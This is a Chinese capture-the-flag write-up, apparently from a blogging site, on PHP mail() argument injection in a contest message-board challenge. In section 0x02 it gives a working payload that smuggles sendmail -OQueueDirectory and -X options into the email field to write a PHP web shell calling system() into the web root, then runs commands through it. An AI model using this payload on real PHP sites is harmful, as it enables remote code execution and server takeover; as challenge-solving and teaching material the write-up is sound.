PHP mail函數(shù)漏洞利用(安恒杯1月賽 經(jīng)典留言板)

利用mail函數(shù)可以使攻擊者達(dá)到遠(yuǎn)程代碼執(zhí)行權(quán)限以及其他惡意目的。

0x00獲取源碼

第一步訪問(wèn)/.index.php.swp源碼找到泄露的源碼蝙昙,主要功能代碼大致如下。

if(isset($_POST['submit'])){
    $email = isset($_POST['email'])?trim($_POST['email']):'';
    $title = isset($_POST['title'])?trim($_POST['title']):'';
    $content = isset($_POST['content'])?trim($_POST['content']):'';
    if(chkEmail($email) && chkTitle($title) && chkContent($content)){
        $to = 'ambulong@vulnspy.com';
        $subject = "收到來(lái)自 {$email} 的留言";
        $msg = "{$title}\n{$content}\nFrom: {$email}";
        $headers = 'From: ' . $email . "\r\n" .
            'Reply-To: ' . $email . "\r\n" .
            'X-Mailer: PHP/' . phpversion();
        $options = sprintf('-f%s', $email);
        if(mail($to, $subject, $msg, $headers, $options)){
            echo "發(fā)送成功";
        }else{
            echo "發(fā)送失敗";
        }
    }
    exit;
}

0x01mail函數(shù)分析

mail函數(shù)

mail函數(shù)用于從PHP應(yīng)用程序發(fā)送電子郵件,包括五個(gè)參數(shù)佳头。
bool mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )

其參數(shù)描述如下:

參數(shù)名 描述
to 郵件的接收者
subject 郵件的主題
message 發(fā)送的消息
headers 額外的報(bào)頭
parameters 程序的額外參數(shù)

其中第五個(gè)參數(shù)的描述為:

The additional_parameters parameter can be used to pass additional flags as command line options to the program configured to be used when sending mail, as defined by the sendmail_path configuration setting. For example, this can be used to set the envelope sender address when using sendmail with the -f sendmail option.
This parameter is escaped by escapeshellcmd() internally to prevent command execution. escapeshellcmd() prevents command execution, but allows to add additional parameters. For security reasons, it is recommended for the user to sanitize this parameter to avoid adding unwanted parameters to the shell command.

通常间影,該參數(shù)被web應(yīng)用用來(lái)設(shè)置發(fā)送者的地址注竿,例如:-f miao@abc.com。mail函數(shù)會(huì)被系統(tǒng)中的 /usr/bin/sendmail 程序調(diào)用魂贬,該程序由郵件傳輸代理軟件安裝在系統(tǒng)上巩割,是用來(lái)發(fā)送郵件的接口。sendmail命令會(huì)在系統(tǒng)shell的幫助下執(zhí)行付燥。

攻擊向量
sendmail    的第五個(gè)參數(shù)可以通過(guò) *-O* 宣谈、*-X* 、*-C* 參數(shù)導(dǎo)致任意文件讀寫(xiě)键科。
-OQueueDirectory=/tmp    選擇一個(gè)可以寫(xiě)的目錄保存臨時(shí)文件
-X/tmp/log.txt  保存日志文件到任意目錄

其中-OQueueDirectory=/tmp可以簡(jiǎn)寫(xiě)為-oQ/tmp/闻丑;
-X參數(shù)也可以接受相對(duì)路徑漩怎,例如-X ./log.txt

0x02漏洞利用

回到原題嗦嗡,觀察源碼中的這兩行勋锤,$options參數(shù)是用戶可控的,為-f拼接用戶填寫(xiě)的email字段侥祭。

        $options = sprintf('-f%s', $email);
        if(mail($to, $subject, $msg, $headers, $options)){...}

構(gòu)造POST參數(shù)如下(其中web根目錄是按照常理猜測(cè)的叁执,構(gòu)造相對(duì)路徑也可):
email=miao@126.com -OQueueDirectory=/tmp -X/var/www/html/black.php
content=<?php system($_GET["black"]); ?>

然后訪問(wèn)/black.php?black=command,最后讀取flag.php文件矮冬。

參考:drops.blbana.cc徒恋;http://www.php.net/manual/en/function.mail.phphttp://www.360zhijia.com/360anquanke/197210.html

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末欢伏,一起剝皮案震驚了整個(gè)濱河市入挣,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌硝拧,老刑警劉巖径筏,帶你破解...
    沈念sama閱讀 222,729評(píng)論 6 517
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異障陶,居然都是意外死亡滋恬,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 95,226評(píng)論 3 399
  • 文/潘曉璐 我一進(jìn)店門(mén)抱究,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)恢氯,“玉大人,你說(shuō)我怎么就攤上這事鼓寺⊙猓” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 169,461評(píng)論 0 362
  • 文/不壞的土叔 我叫張陵妈候,是天一觀的道長(zhǎng)敢靡。 經(jīng)常有香客問(wèn)我,道長(zhǎng)苦银,這世上最難降的妖魔是什么啸胧? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 60,135評(píng)論 1 300
  • 正文 為了忘掉前任,我火速辦了婚禮幔虏,結(jié)果婚禮上纺念,老公的妹妹穿的比我還像新娘。我一直安慰自己想括,他們只是感情好陷谱,可當(dāng)我...
    茶點(diǎn)故事閱讀 69,130評(píng)論 6 398
  • 文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著主胧,像睡著了一般叭首。 火紅的嫁衣襯著肌膚如雪习勤。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 52,736評(píng)論 1 312
  • 那天焙格,我揣著相機(jī)與錄音图毕,去河邊找鬼。 笑死眷唉,一個(gè)胖子當(dāng)著我的面吹牛予颤,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播冬阳,決...
    沈念sama閱讀 41,179評(píng)論 3 422
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼蛤虐,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了肝陪?” 一聲冷哼從身側(cè)響起驳庭,我...
    開(kāi)封第一講書(shū)人閱讀 40,124評(píng)論 0 277
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎氯窍,沒(méi)想到半個(gè)月后饲常,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,657評(píng)論 1 320
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡狼讨,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,723評(píng)論 3 342
  • 正文 我和宋清朗相戀三年贝淤,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片政供。...
    茶點(diǎn)故事閱讀 40,872評(píng)論 1 353
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡播聪,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出布隔,到底是詐尸還是另有隱情离陶,我是刑警寧澤,帶...
    沈念sama閱讀 36,533評(píng)論 5 351
  • 正文 年R本政府宣布执泰,位于F島的核電站枕磁,受9級(jí)特大地震影響渡蜻,放射性物質(zhì)發(fā)生泄漏术吝。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 42,213評(píng)論 3 336
  • 文/蒙蒙 一茸苇、第九天 我趴在偏房一處隱蔽的房頂上張望排苍。 院中可真熱鬧,春花似錦学密、人聲如沸淘衙。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 32,700評(píng)論 0 25
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)彤守。三九已至毯侦,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間具垫,已是汗流浹背侈离。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,819評(píng)論 1 274
  • 我被黑心中介騙來(lái)泰國(guó)打工, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留筝蚕,地道東北人卦碾。 一個(gè)月前我還...
    沈念sama閱讀 49,304評(píng)論 3 379
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像起宽,于是被迫代替她去往敵國(guó)和親洲胖。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,876評(píng)論 2 361

推薦閱讀更多精彩內(nèi)容

  • Lua 5.1 參考手冊(cè) by Roberto Ierusalimschy, Luiz Henrique de F...
    蘇黎九歌閱讀 13,836評(píng)論 0 38
  • php.ini設(shè)置,上傳大文件: post_max_size = 128Mupload_max_filesize ...
    bycall閱讀 6,779評(píng)論 3 64
  • **2014真題Directions:Read the following text. Choose the be...
    又是夜半驚坐起閱讀 9,586評(píng)論 0 23
  • Spring Cloud為開(kāi)發(fā)人員提供了快速構(gòu)建分布式系統(tǒng)中一些常見(jiàn)模式的工具(例如配置管理坯沪,服務(wù)發(fā)現(xiàn)绿映,斷路器,智...
    卡卡羅2017閱讀 134,716評(píng)論 18 139
  • 在單向空間聽(tīng)了優(yōu)酷盧梵溪的一場(chǎng)訪談腐晾,整個(gè)活動(dòng)分為三個(gè)部分:1.盧梵溪自我介紹绘梦;2.以萬(wàn)萬(wàn)沒(méi)想到為例,盧梵溪談?wù)剝?yōu)酷...
    紅二閱讀 402評(píng)論 0 1